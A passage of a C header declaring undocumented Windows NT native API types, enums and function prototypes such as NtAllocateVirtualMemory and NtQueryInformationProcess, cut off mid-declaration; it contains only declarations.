typedef struct _FILE_FULL_EA_INFORMATION
{
ULONG NextEntryOffset;
UCHAR Flags;
UCHAR EaNameLength;
USHORT EaValueLength;
CHAR EaName[1];
} FILE_FULL_EA_INFORMATION, * PFILE_FULL_EA_INFORMATION;
typedef struct _FILE_GET_EA_INFORMATION
{
ULONG NextEntryOffset;
BYTE EaNameLength;
CHAR EaName[1];
} FILE_GET_EA_INFORMATION, * PFILE_GET_EA_INFORMATION;
typedef struct _BOOT_OPTIONS
{
ULONG Version;
ULONG Length;
ULONG Timeout;
ULONG CurrentBootEntryId;
ULONG NextBootEntryId;
WCHAR HeadlessRedirection[1];
} BOOT_OPTIONS, * PBOOT_OPTIONS;
typedef ULONG WNF_CHANGE_STAMP, * PWNF_CHANGE_STAMP;
typedef enum _WNF_DATA_SCOPE
{
WnfDataScopeSystem = 0,
WnfDataScopeSession = 1,
WnfDataScopeUser = 2,
WnfDataScopeProcess = 3,
WnfDataScopeMachine = 4
} WNF_DATA_SCOPE, * PWNF_DATA_SCOPE;
typedef enum _WNF_STATE_NAME_LIFETIME
{
WnfWellKnownStateName = 0,
WnfPermanentStateName = 1,
WnfPersistentStateName = 2,
WnfTemporaryStateName = 3
} WNF_STATE_NAME_LIFETIME, * PWNF_STATE_NAME_LIFETIME;
typedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS
{
VmPrefetchInformation,
VmPagePriorityInformation,
VmCfgCallTargetInformation
} VIRTUAL_MEMORY_INFORMATION_CLASS, * PVIRTUAL_MEMORY_INFORMATION_CLASS;
typedef enum _IO_SESSION_EVENT
{
IoSessionEventIgnore,
IoSessionEventCreated,
IoSessionEventTerminated,
IoSessionEventConnected,
IoSessionEventDisconnected,
IoSessionEventLogon,
IoSessionEventLogoff,
IoSessionEventMax
} IO_SESSION_EVENT, * PIO_SESSION_EVENT;
typedef enum _PORT_INFORMATION_CLASS
{
PortBasicInformation,
#if DEVL
PortDumpInformation
#endif
} PORT_INFORMATION_CLASS, * PPORT_INFORMATION_CLASS;
typedef enum _PLUGPLAY_CONTROL_CLASS
{
PlugPlayControlEnumerateDevice,
PlugPlayControlRegisterNewDevice,
PlugPlayControlDeregisterDevice,
PlugPlayControlInitializeDevice,
PlugPlayControlStartDevice,
PlugPlayControlUnlockDevice,
PlugPlayControlQueryAndRemoveDevice,
PlugPlayControlUserResponse,
PlugPlayControlGenerateLegacyDevice,
PlugPlayControlGetInterfaceDeviceList,
PlugPlayControlProperty,
PlugPlayControlDeviceClassAssociation,
PlugPlayControlGetRelatedDevice,
PlugPlayControlGetInterfaceDeviceAlias,
PlugPlayControlDeviceStatus,
PlugPlayControlGetDeviceDepth,
PlugPlayControlQueryDeviceRelations,
PlugPlayControlTargetDeviceRelation,
PlugPlayControlQueryConflictList,
PlugPlayControlRetrieveDock,
PlugPlayControlResetDevice,
PlugPlayControlHaltDevice,
PlugPlayControlGetBlockedDriverList,
MaxPlugPlayControl
} PLUGPLAY_CONTROL_CLASS, * PPLUGPLAY_CONTROL_CLASS;
typedef enum _IO_COMPLETION_INFORMATION_CLASS
{
IoCompletionBasicInformation
} IO_COMPLETION_INFORMATION_CLASS, * PIO_COMPLETION_INFORMATION_CLASS;
typedef enum _SECTION_INHERIT
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT, * PSECTION_INHERIT;
typedef enum _DEBUGOBJECTINFOCLASS
{
DebugObjectFlags = 1,
MaxDebugObjectInfoClass
} DEBUGOBJECTINFOCLASS, * PDEBUGOBJECTINFOCLASS;
typedef enum _SEMAPHORE_INFORMATION_CLASS
{
SemaphoreBasicInformation
} SEMAPHORE_INFORMATION_CLASS, * PSEMAPHORE_INFORMATION_CLASS;
typedef struct _PS_ATTRIBUTE_LIST
{
SIZE_T TotalLength;
PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;
typedef enum _VDMSERVICECLASS
{
VdmStartExecution,
VdmQueueInterrupt,
VdmDelayInterrupt,
VdmInitialize,
VdmFeatures,
VdmSetInt21Handler,
VdmQueryDir,
VdmPrinterDirectIoOpen,
VdmPrinterDirectIoClose,
VdmPrinterInitialize,
VdmSetLdtEntries,
VdmSetProcessLdtInfo,
VdmAdlibEmulation,
VdmPMCliControl,
VdmQueryVdmProcess
} VDMSERVICECLASS, * PVDMSERVICECLASS;
typedef struct _PS_CREATE_INFO
{
SIZE_T Size;
PS_CREATE_STATE State;
union
{
// PsCreateInitialState
struct {
union {
ULONG InitFlags;
struct {
UCHAR WriteOutputOnExit : 1;
UCHAR DetectManifest : 1;
UCHAR IFEOSkipDebugger : 1;
UCHAR IFEODoNotPropagateKeyState : 1;
UCHAR SpareBits1 : 4;
UCHAR SpareBits2 : 8;
USHORT ProhibitedImageCharacteristics : 16;
};
};
ACCESS_MASK AdditionalFileAccess;
} InitState;
// PsCreateFailOnSectionCreate
struct {
HANDLE FileHandle;
} FailSection;
// PsCreateFailExeFormat
struct {
USHORT DllCharacteristics;
} ExeFormat;
// PsCreateFailExeName
struct {
HANDLE IFEOKey;
} ExeName;
// PsCreateSuccess
struct {
union {
ULONG OutputFlags;
struct {
UCHAR ProtectedProcess : 1;
UCHAR AddressSpaceOverride : 1;
UCHAR DevOverrideEnabled : 1; // from Image File Execution Options
UCHAR ManifestDetected : 1;
UCHAR ProtectedProcessLight : 1;
UCHAR SpareBits1 : 3;
UCHAR SpareBits2 : 8;
USHORT SpareBits3 : 16;
};
};
HANDLE FileHandle;
HANDLE SectionHandle;
ULONGLONG UserProcessParametersNative;
ULONG UserProcessParametersWow64;
ULONG CurrentParameterFlags;
ULONGLONG PebAddressNative;
ULONG PebAddressWow64;
ULONGLONG ManifestAddress;
ULONG ManifestSize;
} SuccessState;
};
} PS_CREATE_INFO, * PPS_CREATE_INFO;
typedef enum _MEMORY_INFORMATION_CLASS
{
MemoryBasicInformation,
MemoryWorkingSetInformation,
MemoryMappedFilenameInformation,
MemoryRegionInformation,
MemoryWorkingSetExInformation,
MemorySharedCommitInformation,
MemoryImageInformation,
MemoryRegionInformationEx,
MemoryPrivilegedBasicInformation,
MemoryEnclaveImageInformation,
MemoryBasicInformationCapped
} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS;
typedef enum _MEMORY_RESERVE_TYPE
{
MemoryReserveUserApc,
MemoryReserveIoCompletion,
MemoryReserveTypeMax
} MEMORY_RESERVE_TYPE, * PMEMORY_RESERVE_TYPE;
typedef enum _ALPC_PORT_INFORMATION_CLASS
{
AlpcBasicInformation,
AlpcPortInformation,
AlpcAssociateCompletionPortInformation,
AlpcConnectedSIDInformation,
AlpcServerInformation,
AlpcMessageZoneInformation,
AlpcRegisterCompletionListInformation,
AlpcUnregisterCompletionListInformation,
AlpcAdjustCompletionListConcurrencyCountInformation,
AlpcRegisterCallbackInformation,
AlpcCompletionListRundownInformation
} ALPC_PORT_INFORMATION_CLASS, * PALPC_PORT_INFORMATION_CLASS;
typedef struct _ALPC_CONTEXT_ATTR
{
PVOID PortContext;
PVOID MessageContext;
ULONG SequenceNumber;
ULONG MessageID;
ULONG CallbackID;
} ALPC_CONTEXT_ATTR, * PALPC_CONTEXT_ATTR;
typedef struct _ALPC_DATA_VIEW_ATTR
{
ULONG Flags;
HANDLE SectionHandle;
PVOID ViewBase;
SIZE_T ViewSize;
} ALPC_DATA_VIEW_ATTR, * PALPC_DATA_VIEW_ATTR;
typedef struct _ALPC_SECURITY_ATTR
{
ULONG Flags;
PSECURITY_QUALITY_OF_SERVICE SecurityQos;
HANDLE ContextHandle;
ULONG Reserved1;
ULONG Reserved2;
} ALPC_SECURITY_ATTR, * PALPC_SECURITY_ATTR;
typedef PVOID* PPVOID;
typedef enum _KPROFILE_SOURCE
{
ProfileTime = 0,
ProfileAlignmentFixup = 1,
ProfileTotalIssues = 2,
ProfilePipelineDry = 3,
ProfileLoadInstructions = 4,
ProfilePipelineFrozen = 5,
ProfileBranchInstructions = 6,
ProfileTotalNonissues = 7,
ProfileDcacheMisses = 8,
ProfileIcacheMisses = 9,
ProfileCacheMisses = 10,
ProfileBranchMispredictions = 11,
ProfileStoreInstructions = 12,
ProfileFpInstructions = 13,
ProfileIntegerInstructions = 14,
Profile2Issue = 15,
Profile3Issue = 16,
Profile4Issue = 17,
ProfileSpecialInstructions = 18,
ProfileTotalCycles = 19,
ProfileIcacheIssues = 20,
ProfileDcacheAccesses = 21,
ProfileMemoryBarrierCycles = 22,
ProfileLoadLinkedIssues = 23,
ProfileMaximum = 24,
} KPROFILE_SOURCE, * PKPROFILE_SOURCE;
typedef enum _ALPC_MESSAGE_INFORMATION_CLASS
{
AlpcMessageSidInformation,
AlpcMessageTokenModifiedIdInformation
} ALPC_MESSAGE_INFORMATION_CLASS, * PALPC_MESSAGE_INFORMATION_CLASS;
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout,
WorkerFactoryRetryTimeout,
WorkerFactoryIdleTimeout,
WorkerFactoryBindingCount,
WorkerFactoryThreadMinimum,
WorkerFactoryThreadMaximum,
WorkerFactoryPaused,
WorkerFactoryBasicInformation,
WorkerFactoryAdjustThreadGoal,
WorkerFactoryCallbackType,
WorkerFactoryStackInformation,
MaxWorkerFactoryInfoClass
} WORKERFACTORYINFOCLASS, * PWORKERFACTORYINFOCLASS;
typedef enum _MEMORY_PARTITION_INFORMATION_CLASS
{
SystemMemoryPartitionInformation,
SystemMemoryPartitionMoveMemory,
SystemMemoryPartitionAddPagefile,
SystemMemoryPartitionCombineMemory,
SystemMemoryPartitionInitialAddMemory,
SystemMemoryPartitionGetMemoryEvents,
SystemMemoryPartitionMax
} MEMORY_PARTITION_INFORMATION_CLASS, * PMEMORY_PARTITION_INFORMATION_CLASS;
typedef enum _MUTANT_INFORMATION_CLASS
{
MutantBasicInformation,
MutantOwnerInformation
} MUTANT_INFORMATION_CLASS, * PMUTANT_INFORMATION_CLASS;
typedef enum _ATOM_INFORMATION_CLASS
{
AtomBasicInformation,
AtomTableInformation
} ATOM_INFORMATION_CLASS, * PATOM_INFORMATION_CLASS;
typedef enum _SHUTDOWN_ACTION {
ShutdownNoReboot,
ShutdownReboot,
ShutdownPowerOff
} SHUTDOWN_ACTION;
typedef VOID(CALLBACK* PTIMER_APC_ROUTINE)(
IN PVOID TimerContext,
IN ULONG TimerLowValue,
IN LONG TimerHighValue);
typedef enum _KEY_VALUE_INFORMATION_CLASS {
KeyValueBasicInformation = 0,
KeyValueFullInformation,
KeyValuePartialInformation,
KeyValueFullInformationAlign64,
KeyValuePartialInformationAlign64,
MaxKeyValueInfoClass
} KEY_VALUE_INFORMATION_CLASS;
typedef LANGID* PLANGID;
typedef struct _PLUGPLAY_EVENT_BLOCK
{
GUID EventGuid;
PLUGPLAY_EVENT_CATEGORY EventCategory;
PULONG Result;
ULONG Flags;
ULONG TotalSize;
PVOID DeviceObject;
union
{
struct
{
GUID ClassGuid;
WCHAR SymbolicLinkName[1];
} DeviceClass;
struct
{
WCHAR DeviceIds[1];
} TargetDevice;
struct
{
WCHAR DeviceId[1];
} InstallDevice;
struct
{
PVOID NotificationStructure;
WCHAR DeviceIds[1];
} CustomNotification;
struct
{
PVOID Notification;
} ProfileNotification;
struct
{
ULONG NotificationCode;
ULONG NotificationData;
} PowerNotification;
struct
{
PNP_VETO_TYPE VetoType;
WCHAR DeviceIdVetoNameBuffer[1]; // DeviceId<null>VetoName<null><null>
} VetoNotification;
struct
{
GUID BlockedDriverGuid;
} BlockedDriverNotification;
struct
{
WCHAR ParentId[1];
} InvalidIDNotification;
} u;
} PLUGPLAY_EVENT_BLOCK, * PPLUGPLAY_EVENT_BLOCK;
typedef VOID(NTAPI* PIO_APC_ROUTINE) (
IN PVOID ApcContext,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG Reserved);
typedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;
typedef enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
{
DirectoryNotifyInformation = 1,
DirectoryNotifyExtendedInformation = 2,
} DIRECTORY_NOTIFY_INFORMATION_CLASS, * PDIRECTORY_NOTIFY_INFORMATION_CLASS;
typedef enum _EVENT_INFORMATION_CLASS
{
EventBasicInformation
} EVENT_INFORMATION_CLASS, * PEVENT_INFORMATION_CLASS;
typedef struct _ALPC_MESSAGE_ATTRIBUTES
{
unsigned long AllocatedAttributes;
unsigned long ValidAttributes;
} ALPC_MESSAGE_ATTRIBUTES, * PALPC_MESSAGE_ATTRIBUTES;
typedef struct _ALPC_PORT_ATTRIBUTES
{
ULONG Flags;
SECURITY_QUALITY_OF_SERVICE SecurityQos;
SIZE_T MaxMessageLength;
SIZE_T MemoryBandwidth;
SIZE_T MaxPoolUsage;
SIZE_T MaxSectionSize;
SIZE_T MaxViewSize;
SIZE_T MaxTotalSectionSize;
ULONG DupObjectTypes;
#ifdef _WIN64
ULONG Reserved;
#endif
} ALPC_PORT_ATTRIBUTES, * PALPC_PORT_ATTRIBUTES;
typedef enum _IO_SESSION_STATE
{
IoSessionStateCreated = 1,
IoSessionStateInitialized = 2,
IoSessionStateConnected = 3,
IoSessionStateDisconnected = 4,
IoSessionStateDisconnectedLoggedOn = 5,
IoSessionStateLoggedOn = 6,
IoSessionStateLoggedOff = 7,
IoSessionStateTerminated = 8,
IoSessionStateMax = 9,
} IO_SESSION_STATE, * PIO_SESSION_STATE;
typedef const WNF_STATE_NAME* PCWNF_STATE_NAME;
typedef const WNF_TYPE_ID* PCWNF_TYPE_ID;
typedef struct _WNF_DELIVERY_DESCRIPTOR
{
unsigned __int64 SubscriptionId;
WNF_STATE_NAME StateName;
unsigned long ChangeStamp;
unsigned long StateDataSize;
unsigned long EventMask;
WNF_TYPE_ID TypeId;
unsigned long StateDataOffset;
} WNF_DELIVERY_DESCRIPTOR, * PWNF_DELIVERY_DESCRIPTOR;
typedef enum _DEBUG_CONTROL_CODE
{
SysDbgQueryModuleInformation = 0,
SysDbgQueryTraceInformation = 1,
SysDbgSetTracePoint = 2,
SysDbgSetSpecialCall = 3,
SysDbgClearSpecialCalls = 4,
SysDbgQuerySpecialCalls = 5,
SysDbgBreakPoint = 6,
SysDbgQueryVersion = 7,
SysDbgReadVirtual = 8,
SysDbgWriteVirtual = 9,
SysDbgReadPhysical = 10,
SysDbgWritePhysical = 11,
SysDbgReadControlSpace = 12,
SysDbgWriteControlSpace = 13,
SysDbgReadIoSpace = 14,
SysDbgWriteIoSpace = 15,
SysDbgReadMsr = 16,
SysDbgWriteMsr = 17,
SysDbgReadBusData = 18,
SysDbgWriteBusData = 19,
SysDbgCheckLowMemory = 20,
SysDbgEnableKernelDebugger = 21,
SysDbgDisableKernelDebugger = 22,
SysDbgGetAutoKdEnable = 23,
SysDbgSetAutoKdEnable = 24,
SysDbgGetPrintBufferSize = 25,
SysDbgSetPrintBufferSize = 26,
SysDbgGetKdUmExceptionEnable = 27,
SysDbgSetKdUmExceptionEnable = 28,
SysDbgGetTriageDump = 29,
SysDbgGetKdBlockEnable = 30,
SysDbgSetKdBlockEnable = 31
} DEBUG_CONTROL_CODE, * PDEBUG_CONTROL_CODE;
typedef struct _PORT_MESSAGE
{
union
{
union
{
struct
{
short DataLength;
short TotalLength;
} s1;
unsigned long Length;
};
} u1;
union
{
union
{
struct
{
short Type;
short DataInfoOffset;
} s2;
unsigned long ZeroInit;
};
} u2;
union
{
CLIENT_ID ClientId;
double DoNotUseThisField;
};
unsigned long MessageId;
union
{
unsigned __int64 ClientViewSize;
struct
{
unsigned long CallbackId;
long __PADDING__[1];
};
};
} PORT_MESSAGE, * PPORT_MESSAGE;
typedef struct FILE_BASIC_INFORMATION
{
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, * PFILE_BASIC_INFORMATION;
typedef struct _PORT_SECTION_READ
{
ULONG Length;
ULONG ViewSize;
ULONG ViewBase;
} PORT_SECTION_READ, * PPORT_SECTION_READ;
typedef struct _PORT_SECTION_WRITE
{
ULONG Length;
HANDLE SectionHandle;
ULONG SectionOffset;
ULONG ViewSize;
PVOID ViewBase;
PVOID TargetViewBase;
} PORT_SECTION_WRITE, * PPORT_SECTION_WRITE;
typedef enum _TIMER_TYPE
{
NotificationTimer,
SynchronizationTimer
} TIMER_TYPE, * PTIMER_TYPE;
typedef struct _BOOT_ENTRY
{
ULONG Version;
ULONG Length;
ULONG Id;
ULONG Attributes;
ULONG FriendlyNameOffset;
ULONG BootFilePathOffset;
ULONG OsOptionsLength;
UCHAR OsOptions[ANYSIZE_ARRAY];
} BOOT_ENTRY, * PBOOT_ENTRY;
typedef struct _EFI_DRIVER_ENTRY
{
ULONG Version;
ULONG Length;
ULONG Id;
ULONG Attributes;
ULONG FriendlyNameOffset;
ULONG DriverFilePathOffset;
} EFI_DRIVER_ENTRY, * PEFI_DRIVER_ENTRY;
typedef USHORT RTL_ATOM, * PRTL_ATOM;
typedef enum _TIMER_SET_INFORMATION_CLASS
{
TimerSetCoalescableTimer,
MaxTimerInfoClass
} TIMER_SET_INFORMATION_CLASS, * PTIMER_SET_INFORMATION_CLASS;
typedef enum _FSINFOCLASS
{
FileFsVolumeInformation = 1,
FileFsLabelInformation = 2,
FileFsSizeInformation = 3,
FileFsDeviceInformation = 4,
FileFsAttributeInformation = 5,
FileFsControlInformation = 6,
FileFsFullSizeInformation = 7,
FileFsObjectIdInformation = 8,
FileFsDriverPathInformation = 9,
FileFsVolumeFlagsInformation = 10,
FileFsSectorSizeInformation = 11,
FileFsDataCopyInformation = 12,
FileFsMetadataSizeInformation = 13,
FileFsFullSizeInformationEx = 14,
FileFsMaximumInformation = 15,
} FSINFOCLASS, * PFSINFOCLASS;
typedef enum _WAIT_TYPE
{
WaitAll = 0,
WaitAny = 1
} WAIT_TYPE, * PWAIT_TYPE;
typedef struct _USER_STACK
{
PVOID FixedStackBase;
PVOID FixedStackLimit;
PVOID ExpandableStackBase;
PVOID ExpandableStackLimit;
PVOID ExpandableStackBottom;
} USER_STACK, * PUSER_STACK;
typedef enum _SECTION_INFORMATION_CLASS
{
SectionBasicInformation,
SectionImageInformation,
} SECTION_INFORMATION_CLASS, * PSECTION_INFORMATION_CLASS;
typedef enum _APPHELPCACHESERVICECLASS
{
ApphelpCacheServiceLookup = 0,
ApphelpCacheServiceRemove = 1,
ApphelpCacheServiceUpdate = 2,
ApphelpCacheServiceFlush = 3,
ApphelpCacheServiceDump = 4,
ApphelpDBGReadRegistry = 0x100,
ApphelpDBGWriteRegistry = 0x101,
} APPHELPCACHESERVICECLASS, * PAPPHELPCACHESERVICECLASS;
typedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION
{
USHORT Version;
USHORT Reserved;
ULONG AttributeCount;
union
{
PTOKEN_SECURITY_ATTRIBUTE_V1 pAttributeV1;
} Attribute;
} TOKEN_SECURITY_ATTRIBUTES_INFORMATION, * PTOKEN_SECURITY_ATTRIBUTES_INFORMATION;
typedef struct _FILE_IO_COMPLETION_INFORMATION
{
PVOID KeyContext;
PVOID ApcContext;
IO_STATUS_BLOCK IoStatusBlock;
} FILE_IO_COMPLETION_INFORMATION, * PFILE_IO_COMPLETION_INFORMATION;
typedef PVOID PT2_CANCEL_PARAMETERS;
typedef enum _THREADINFOCLASS
{
ThreadBasicInformation,
ThreadTimes,
ThreadPriority,
ThreadBasePriority,
ThreadAffinityMask,
ThreadImpersonationToken,
ThreadDescriptorTableEntry,
ThreadEnableAlignmentFaultFixup,
ThreadEventPair_Reusable,
ThreadQuerySetWin32StartAddress,
ThreadZeroTlsCell,
ThreadPerformanceCount,
ThreadAmILastThread,
ThreadIdealProcessor,
ThreadPriorityBoost,
ThreadSetTlsArrayAddress,
ThreadIsIoPending,
ThreadHideFromDebugger,
ThreadBreakOnTermination,
MaxThreadInfoClass
} THREADINFOCLASS, * PTHREADINFOCLASS;
typedef enum _OBJECT_INFORMATION_CLASS
{
ObjectBasicInformation,
ObjectNameInformation,
ObjectTypeInformation,
ObjectAllTypesInformation,
ObjectHandleInformation
} OBJECT_INFORMATION_CLASS, * POBJECT_INFORMATION_CLASS;
typedef enum _FILE_INFORMATION_CLASS
{
FileDirectoryInformation = 1,
FileFullDirectoryInformation = 2,
FileBothDirectoryInformation = 3,
FileBasicInformation = 4,
FileStandardInformation = 5,
FileInternalInformation = 6,
FileEaInformation = 7,
FileAccessInformation = 8,
FileNameInformation = 9,
FileRenameInformation = 10,
FileLinkInformation = 11,
FileNamesInformation = 12,
FileDispositionInformation = 13,
FilePositionInformation = 14,
FileFullEaInformation = 15,
FileModeInformation = 16,
FileAlignmentInformation = 17,
FileAllInformation = 18,
FileAllocationInformation = 19,
FileEndOfFileInformation = 20,
FileAlternateNameInformation = 21,
FileStreamInformation = 22,
FilePipeInformation = 23,
FilePipeLocalInformation = 24,
FilePipeRemoteInformation = 25,
FileMailslotQueryInformation = 26,
FileMailslotSetInformation = 27,
FileCompressionInformation = 28,
FileObjectIdInformation = 29,
FileCompletionInformation = 30,
FileMoveClusterInformation = 31,
FileQuotaInformation = 32,
FileReparsePointInformation = 33,
FileNetworkOpenInformation = 34,
FileAttributeTagInformation = 35,
FileTrackingInformation = 36,
FileIdBothDirectoryInformation = 37,
FileIdFullDirectoryInformation = 38,
FileValidDataLengthInformation = 39,
FileShortNameInformation = 40,
FileIoCompletionNotificationInformation = 41,
FileIoStatusBlockRangeInformation = 42,
FileIoPriorityHintInformation = 43,
FileSfioReserveInformation = 44,
FileSfioVolumeInformation = 45,
FileHardLinkInformation = 46,
FileProcessIdsUsingFileInformation = 47,
FileNormalizedNameInformation = 48,
FileNetworkPhysicalNameInformation = 49,
FileIdGlobalTxDirectoryInformation = 50,
FileIsRemoteDeviceInformation = 51,
FileUnusedInformation = 52,
FileNumaNodeInformation = 53,
FileStandardLinkInformation = 54,
FileRemoteProtocolInformation = 55,
FileRenameInformationBypassAccessCheck = 56,
FileLinkInformationBypassAccessCheck = 57,
FileVolumeNameInformation = 58,
FileIdInformation = 59,
FileIdExtdDirectoryInformation = 60,
FileReplaceCompletionInformation = 61,
FileHardLinkFullIdInformation = 62,
FileIdExtdBothDirectoryInformation = 63,
FileDispositionInformationEx = 64,
FileRenameInformationEx = 65,
FileRenameInformationExBypassAccessCheck = 66,
FileMaximumInformation = 67,
} FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;
typedef enum _KEY_INFORMATION_CLASS
{
KeyBasicInformation = 0,
KeyNodeInformation = 1,
KeyFullInformation = 2,
KeyNameInformation = 3,
KeyCachedInformation = 4,
KeyFlagsInformation = 5,
KeyVirtualizationInformation = 6,
KeyHandleTagsInformation = 7,
MaxKeyInfoClass = 8
} KEY_INFORMATION_CLASS, * PKEY_INFORMATION_CLASS;
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef enum _TIMER_INFORMATION_CLASS
{
TimerBasicInformation
} TIMER_INFORMATION_CLASS, * PTIMER_INFORMATION_CLASS;
typedef struct _KCONTINUE_ARGUMENT
{
KCONTINUE_TYPE ContinueType;
ULONG ContinueFlags;
ULONGLONG Reserved[2];
} KCONTINUE_ARGUMENT, * PKCONTINUE_ARGUMENT;
EXTERN_C NTSTATUS NtAccessCheck(
IN PSECURITY_DESCRIPTOR pSecurityDescriptor,
IN HANDLE ClientToken,
IN ACCESS_MASK DesiaredAccess,
IN PGENERIC_MAPPING GenericMapping,
OUT PPRIVILEGE_SET PrivilegeSet OPTIONAL,
IN OUT PULONG PrivilegeSetLength,
OUT PACCESS_MASK GrantedAccess,
OUT PBOOLEAN AccessStatus);
EXTERN_C NTSTATUS NtWorkerFactoryWorkerReady(
IN HANDLE WorkerFactoryHandle);
EXTERN_C NTSTATUS NtAcceptConnectPort(
OUT PHANDLE ServerPortHandle,
IN ULONG AlternativeReceivePortHandle OPTIONAL,
IN PPORT_MESSAGE ConnectionReply,
IN BOOLEAN AcceptConnection,
IN OUT PPORT_SECTION_WRITE ServerSharedMemory OPTIONAL,
OUT PPORT_SECTION_READ ClientSharedMemory OPTIONAL);
EXTERN_C NTSTATUS NtMapUserPhysicalPagesScatter(
IN PVOID VirtualAddresses,
IN PULONG NumberOfPages,
IN PULONG UserPfnArray OPTIONAL);
EXTERN_C NTSTATUS NtWaitForSingleObject(
IN HANDLE ObjectHandle,
IN BOOLEAN Alertable,
IN PLARGE_INTEGER TimeOut OPTIONAL);
EXTERN_C NTSTATUS NtCallbackReturn(
IN PVOID OutputBuffer OPTIONAL,
IN ULONG OutputLength,
IN NTSTATUS Status);
EXTERN_C NTSTATUS NtReadFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
OUT PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL);
EXTERN_C NTSTATUS NtDeviceIoControlFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength);
EXTERN_C NTSTATUS NtWriteFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL);
EXTERN_C NTSTATUS NtRemoveIoCompletion(
IN HANDLE IoCompletionHandle,
OUT PULONG KeyContext,
OUT PULONG ApcContext,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtReleaseSemaphore(
IN HANDLE SemaphoreHandle,
IN LONG ReleaseCount,
OUT PLONG PreviousCount OPTIONAL);
EXTERN_C NTSTATUS NtReplyWaitReceivePort(
IN HANDLE PortHandle,
OUT PVOID PortContext OPTIONAL,
IN PPORT_MESSAGE ReplyMessage OPTIONAL,
OUT PPORT_MESSAGE ReceiveMessage);
EXTERN_C NTSTATUS NtReplyPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE ReplyMessage);
EXTERN_C NTSTATUS NtSetInformationThread(
IN HANDLE ThreadHandle,
IN THREADINFOCLASS ThreadInformationClass,
IN PVOID ThreadInformation,
IN ULONG ThreadInformationLength);
EXTERN_C NTSTATUS NtSetEvent(
IN HANDLE EventHandle,
OUT PULONG PreviousState OPTIONAL);
EXTERN_C NTSTATUS NtClose(
IN HANDLE Handle);
EXTERN_C NTSTATUS NtQueryObject(
IN HANDLE Handle,
IN OBJECT_INFORMATION_CLASS ObjectInformationClass,
OUT PVOID ObjectInformation OPTIONAL,
IN ULONG ObjectInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass);
EXTERN_C NTSTATUS NtOpenKey(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtEnumerateValueKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
OUT PVOID KeyValueInformation OPTIONAL,
IN ULONG Length,
OUT PULONG ResultLength);
EXTERN_C NTSTATUS NtFindAtom(
IN PWSTR AtomName OPTIONAL,
IN ULONG Length,
OUT PUSHORT Atom OPTIONAL);
EXTERN_C NTSTATUS NtQueryDefaultLocale(
IN BOOLEAN UserProfile,
OUT PLCID DefaultLocaleId);
EXTERN_C NTSTATUS NtQueryKey(
IN HANDLE KeyHandle,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation OPTIONAL,
IN ULONG Length,
OUT PULONG ResultLength);
EXTERN_C NTSTATUS NtQueryValueKey(
IN HANDLE KeyHandle,
IN PUNICODE_STRING ValueName,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
OUT PVOID KeyValueInformation OPTIONAL,
IN ULONG Length,
OUT PULONG ResultLength);
EXTERN_C NTSTATUS NtAllocateVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID* BaseAddress,
IN ULONG ZeroBits,
IN OUT PSIZE_T RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
EXTERN_C NTSTATUS NtQueryInformationProcess(
IN HANDLE ProcessHandle,
IN PROCESSINFOCLASS ProcessInformationClass,
OUT PVOID ProcessInformation,
IN ULONG ProcessInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtWaitForMultipleObjects32(
IN ULONG ObjectCount,
IN PHANDLE Handles,
IN WAIT_TYPE WaitType,
IN BOOLEAN Alertable,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtWriteFileGather(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
